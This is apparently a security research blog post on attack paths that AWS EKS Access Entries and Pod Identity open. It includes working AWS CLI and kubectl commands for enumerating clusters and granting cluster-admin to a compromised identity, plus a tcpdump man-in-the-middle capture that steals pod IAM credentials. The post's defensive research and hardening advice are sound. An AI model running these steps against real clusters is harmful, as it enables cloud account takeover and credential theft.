New attack vectors in EKS

We explore how advancements in EKS Access Entries and Pod Identity have opened new attack vectors and offer examples of how adversaries could exploit them.


TL;DR 

AWS recently enhanced its managed Kubernetes service, EKS, with the introduction of EKS Access Entries and Policies, along with EKS Pod Identity. These advancements streamline the workflow for cluster administrators by improving how IAM identities (users/roles) authenticate and are authorized to EKS clusters, and by improving how applications authenticate to AWS resources such as S3 buckets and DynamoDB tables.

While these features offer significant benefits, they also open new avenues for exploitation by malicious actors, who could leverage them to facilitate lateral movement between the cloud and the cluster, and vice versa. In the previous blog in this series, we analyzed the new features from a security best practices perspective. In this blog, we will delve into various tactics, techniques, and procedures (TTPs) that adversaries might employ, capitalizing on these new capabilities.

Cloud to cluster 

Enumeration 

Consider a scenario where an IAM user or role is compromised by an attacker. With EKS Access Entries and Policies, the attacker could potentially scan and enumerate all clusters that use the new EKS authentication mode and are accessible to the compromised identity.

The necessary permissions for this operation are eks:DescribeAccessEntry or eks:ListAssociatedAccessPolicies (or both), plus eks:ListClusters and eks:DescribeCluster (likely granted if the identity has been authorized to access the cluster).

Initially, the attacker would run the cloud equivalent of whoami (aws sts get-caller-identity) to extract the compromised identity’s ARN. Then, for each discovered cluster, they would enumerate the access policies (using the ListAssociatedAccessPolicies API) and the Kubernetes groups (using the DescribeAccessEntry API) associated with the identity:

aws eks list-associated-access-policies --cluster-name <cluster-name> --principal-arn <identity-arn> 

aws eks describe-access-entry --cluster-name <cluster-name> --principal-arn <identity-arn> 

This process can be automated to target all clusters in the account across all regions, allowing the attacker to determine the EKS cluster access level of the compromised identity, its privileges, and the Kubernetes groups it belongs to. 
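
The loop below is a minimal bash sketch of that automation. It assumes the AWS CLI is configured and that ec2:DescribeRegions is also permitted; otherwise, substitute a hard-coded region list.

#!/bin/bash
# Resolve the compromised identity's ARN, then probe every cluster in every region.
ARN=$(aws sts get-caller-identity --query Arn --output text)
for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
  for cluster in $(aws eks list-clusters --region "$region" --query 'clusters[]' --output text); do
    echo "== $region / $cluster =="
    # A non-error response from either call means the identity has authorized access to the cluster.
    aws eks list-associated-access-policies --region "$region" --cluster-name "$cluster" --principal-arn "$ARN" 2>/dev/null
    aws eks describe-access-entry --region "$region" --cluster-name "$cluster" --principal-arn "$ARN" 2>/dev/null
  done
done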

If the ListAssociatedAccessPolicies API yields results, the attacker can quickly ascertain the Kubernetes permissions of the identity, as EKS access policies map to Kubernetes' built-in user-facing roles. The mappings are as follows: 

  • AmazonEKSClusterAdminPolicy maps to cluster-admin 

  • AmazonEKSAdminPolicy maps to admin 

  • AmazonEKSEditPolicy maps to edit 

  • AmazonEKSViewPolicy maps to view  

Conversely, if only the DescribeAccessEntry API returns results, further reconnaissance may be needed to understand the RBAC permissions of the assigned Kubernetes group. Note that permissions are additive. In the previous blog, we outlined the new permission calculation algorithm to aid with this exercise.

In any case, a response from either API indicates that the compromised cloud identity has authorized access to the cluster, potentially opening up a pathway for lateral movement by the attacker. 

K8s privilege escalation 

There is potential for privilege escalation on two levels: cloud IAM and K8s RBAC. On the cloud level, an IAM principal with the ability to create access entries and associate them with a high-privileged policy (e.g., AmazonEKSClusterAdminPolicy) or a powerful group can grant itself admin-level access to any accessible cluster, as sketched below. Permissions like eks:CreateAccessEntry and eks:AssociateAccessPolicy should therefore be treated as highly privileged.
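
As a sketch, with placeholder cluster name and principal ARN, the takeover amounts to two calls:

aws eks create-access-entry --cluster-name <cluster-name> --principal-arn <attacker-arn>

aws eks associate-access-policy --cluster-name <cluster-name> --principal-arn <attacker-arn> --access-scope type=cluster --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy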

On the Kubernetes level, there are several potential escalation vectors. Let’s inspect the RBAC permissions associated with each of the built-in policies, starting with the View policy. We can do this by running the aws eks associate-access-policy command on the same access entry with a different --policy-arn parameter and then checking permissions with the auth can-i command, like so:

> aws eks associate-access-policy --cluster-name pod-identity-test --principal-arn arn:aws:iam::XXXXXXXXXXX:user/eksuser --access-scope type=cluster --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSViewPolicy 
… 
> kubectl auth can-i --list
Warning: the list may be incomplete: webhook authorizer does not support user rule resolution 
Resources  Non-Resource URLs   Resource Names   Verbs 
selfsubjectreviews.authentication.k8s.io   []  []  [create] 
selfsubjectaccessreviews.authorization.k8s.io   []   []   [create] 
… 

Unfortunately, auth can-i --list does not show the full permission set, because the permissions for the eksuser are governed by the EKS webhook authorizer and are thus invisible to kubectl. Luckily, the Amazon team has provided the policy-to-RBAC mapping in this table, which we can complement with one-off auth can-i checks, like so:

> kubectl auth can-i get pods 
yes 
> kubectl auth can-i get secrets 
no

We can learn a few things from this: 

1: As expected, the AmazonEKSViewPolicy is the most minimalistic: it can get/list/watch most resources, without access to secrets. Executing into a pod requires creating the pods/exec subresource and is thus unavailable. Note, however, that limiting a user to AmazonEKSViewPolicy does not completely protect against bad security designs and misconfigurations. For example, a plaintext secret exposed in a pod environment variable or in a main process command-line parameter will be visible to the principal through a regular kubectl get pods -A -o json command and can serve as the starting point for a privilege escalation chain within the cluster. Secret exposure is also common in logs, so log access is another potential escalation vector. Here we can see that eksuser is allowed to read the logs of a system pod, as the check below shows.
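
A minimal check (the namespace is illustrative; pods/log is the subresource governing log access):

> kubectl auth can-i get pods/log -n kube-system
yes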

For the sake of simplicity, in our experiment we didn’t scope the user to a namespace and used --access-scope type=cluster. In real-world scenarios, we recommend using namespace scope where possible, as this minimizes the chances of misconfiguration or secret disclosure. Our recommendation is not to assign the AmazonEKSViewPolicy to non-trusted principals but to treat it as a meaningful privilege. For a non-trusted principal, we suggest using a more granular K8s RBAC model rather than EKS access policies, allowing you to grant just the minimum required permissions and preserve the principle of least privilege.

2: The AmazonEKSEditPolicy allows reading secrets and editing resources. This policy should not serve as a security boundary, as there are several possible privilege escalation paths to AmazonEKSClusterAdminPolicy. A related Datadog article mentions pod creation as an escalation vector. Other paths include exec-ing into a pod with a high-privilege service account and performing actions on its behalf, or writing into sensitive ConfigMaps (fluent-bit or node-problem-detector) to gain execution in a privileged context (see our previous research on managed cluster middleware). We can verify the required privileges are present in the AmazonEKSEditPolicy:

> kubectl auth can-i create pods/exec
yes
> kubectl auth can-i get secrets
yes

Of course, with the ability to read secrets, the privilege escalation might not even be needed. 

3: The AmazonEKSClusterAdminPolicy is equivalent to the RBAC cluster-admin role, with wildcard (*) permissions on all resources and verbs.

4: The AmazonEKSAdminPolicy is equivalent to the RBAC admin role and is somewhat restricted when it comes to modifying namespace configuration (it cannot change resource quotas) or gaining cluster-wide reach (it cannot create ClusterRoleBindings to bind its holder to cluster-wide roles). It was designed to support namespace-based multi-tenancy, and you should use this policy with namespace scope.
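
Quick checks of this sort, run as a principal holding AmazonEKSAdminPolicy, confirm those boundaries (the output shown reflects the restrictions described above):

> kubectl auth can-i create clusterrolebindings
no
> kubectl auth can-i create resourcequotas
no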

Access Entries API authentication vs. aws-auth ConfigMap

The implementation of EKS Access Entries significantly simplifies the authentication and authorization processes for IAM identities in EKS clusters. While this enhancement offers great benefits, it also expands the overall attack surface, subsequently increasing the potential for compromising EKS clusters. This underscores the critical importance of rigorously adhering to the principle of least privilege. 

Consider a scenario where an attacker compromises a cloud identity with administrative privileges. If an EKS cluster within the compromised account uses the ConfigMap method for authentication, the attacker's access to the cluster depends on whether the compromised identity created the cluster or was explicitly granted access via the aws-auth ConfigMap, regardless of its administrative privileges in the cloud. However, if the cluster uses the Access Entries API for authentication, the situation escalates. The attacker could use the CreateAccessEntry cloud API to gain access to the cluster. Furthermore, by invoking the AssociateAccessPolicy cloud API, the attacker could assign themselves the AmazonEKSClusterAdminPolicy, which is equivalent to the Kubernetes cluster-admin role, allowing them to move laterally into the cluster and take it over. If an attacker doesn’t have the AssociateAccessPolicy permission but does have CreateAccessEntry, another option is to map the IAM user to one of the existing powerful groups, as sketched below. However, this group must already exist and must not start with system:, eks:, or iam:.
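
A sketch of that fallback, with a placeholder for an existing privileged group defined in the cluster’s RBAC:

aws eks create-access-entry --cluster-name <cluster-name> --principal-arn <attacker-arn> --kubernetes-groups <existing-powerful-group>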

Once in the cluster, an attacker can abuse the existing IRSA or Pod Identity permissions assigned to cluster pods. To find all the pods assigned an EKS Pod Identity, one can run the following command:

[cloudshell-user@ip-10-130-85-108 ~]$ kubectl get pods -o json | jq -r '.items[]|select(any(.spec.containers[].env[];.name=="AWS_CONTAINER_CREDENTIALS_FULL_URI"))|.metadata.name + "   " + .metadata.namespace + "   " + .spec.serviceAccount' | sort -u | uniq 
curl   default   default 
pod-full-bucket-access   default   full-access-sa 
pod-read-bucket-access   default   default 

When mapped to a role with sufficient privileges (one that can create pods/exec, or create a pod with /var/lib/kubelet mounted), an attacker can employ one of the traditional techniques to steal the identity tokens and use them for cloud resource access. Alternatively, an attacker can use the novel MitM stealing technique presented in the next section. In any case, even if the attacker already holds equivalent permissions, they can use the acquired identities for repudiation: forensic investigation is complicated by the fact that the suspicious activity spans both cloud and K8s logs, and both are needed to see the full picture.

Cluster to cloud 

EKS Pod Identity introduces a new attack vector that can be abused to move laterally to the cloud domain, access cloud resources, and escalate privileges in the cloud. 

As AWS outlines in their blog, the EKS Pod Identity Agent — which operates as a DaemonSet on each worker node — exchanges a JWT token for temporary IAM credentials using the AssumeRoleForPodIdentity API. This token is mounted in pods that utilize a Kubernetes service account associated with an IAM role. Under the hood, a pod sends an HTTP GET request with an authorization header containing the JWT token to the local http://169.254.170.23/v1/credentials endpoint managed by the Pod Identity Agent, which then exchanges it for temporary IAM credentials and sends them back to the requesting pod. 
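
From inside a pod configured for Pod Identity, the exchange therefore looks roughly like this (a sketch using the environment variables the Pod Identity admission webhook injects into eligible pods):

# The webhook sets AWS_CONTAINER_CREDENTIALS_FULL_URI (http://169.254.170.23/v1/credentials)
# and AWS_CONTAINER_AUTHORIZATION_TOKEN_FILE (the path of the mounted JWT) in eligible pods.
curl -s -H "Authorization: $(cat $AWS_CONTAINER_AUTHORIZATION_TOKEN_FILE)" "$AWS_CONTAINER_CREDENTIALS_FULL_URI"
# The JSON response contains AccessKeyId, SecretAccessKey, and Token.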

Man-in-the-Middle attack 

From an offensive security perspective, this means that a malicious actor who compromises a pod with a shared network namespace (i.e., a pod with the hostNetwork flag enabled) could execute a "Man-in-the-Middle" (MitM) attack and intercept network traffic to/from the 169.254.170.23 endpoint. Consequently, they could capture temporary IAM credentials associated with an IAM role linked to any Kubernetes service account used by other pods on the same worker node where the compromised host-network-enabled pod is located.

To illustrate this MitM attack, let’s assume we were able to compromise a pod in host network mode (i.e., the pod uses the network namespace of the host node). Let’s use tcpdump to intercept any networking traffic to/from the Pod Identity Agent (169.254.170.23) on any of the network interfaces on the host machine, and write the captured packets to a pcap file for further analysis: 

tcpdump -A -ni any -s0 "host 169.254.170.23" -w output.cap 

Let’s analyze the pcap file using Wireshark.
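
If no GUI is available from the compromised pod, tshark can pull the interesting fields straight from the capture; a sketch, with field names per Wireshark’s HTTP dissector:

tshark -r output.cap -Y http -T fields -e http.host -e http.authorization -e http.file_data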

We can identify two network packets that signify the request and response (in the 1st and 3rd rows, respectively). The first one represents the HTTP GET request originating from a pod (with the IP address of 172.31.15.77) to the Pod Identity Agent endpoint at 169.254.170.23. This pod is requesting the IAM role’s credentials associated with its service account, and notably, the authorization header containing the JWT token is present in plaintext: 

The response packet contains the IAM role’s credentials (AccessKeyId, SecretAccessKey, Token) that were generated by the Pod Identity Agent (in exchange for the JWT token): 

Using these credentials, we can now authenticate as the IAM role and execute cloud actions on behalf of it, subsequently allowing us to move laterally to the cloud and access cloud resources: 

export AWS_ACCESS_KEY_ID="<AccessKeyId>"
export AWS_SECRET_ACCESS_KEY="<SecretAccessKey>"
export AWS_SESSION_TOKEN="<Token>"
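
A quick sanity check confirms that we are now operating as the stolen role:

> aws sts get-caller-identity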

IRSA vs Pod Identity 

While Pod Identity enhances and simplifies the experience of obtaining IAM permissions in the cloud, IRSA is not exposed to the MitM risk we outlined above.

With IRSA, the IAM role ARN is set in the pod’s environment variable (AWS_ROLE_ARN), and together with the mounted JWT token, the pod assumes its associated IAM role directly using the AssumeRoleWithWebIdentity API. This approach prevents token or credential sniffing within the cluster’s network, since the token never needs to be sent to an in-cluster endpoint in exchange for IAM credentials.
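
For comparison, an IRSA-enabled pod typically carries settings along these lines, injected by the EKS mutating webhook (the token path shown is the default):

AWS_ROLE_ARN=arn:aws:iam::<account-id>:role/<role-name>
AWS_WEB_IDENTITY_TOKEN_FILE=/var/run/secrets/eks.amazonaws.com/serviceaccount/token

The SDK exchanges this token with STS directly over TLS, so no credential material transits a local endpoint on the node.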

Conclusion 

In this, the second blog post in our series on new EKS features, we outlined new TTPs in AWS EKS, focusing on EKS Access Entries and Pod Identity. We explored how these advancements in authentication and authorization also open up new avenues for potential attacks. We looked at the possible exploitation of these features by adversaries, highlighting the increased attack surface and emphasizing the importance of the principle of least privilege.
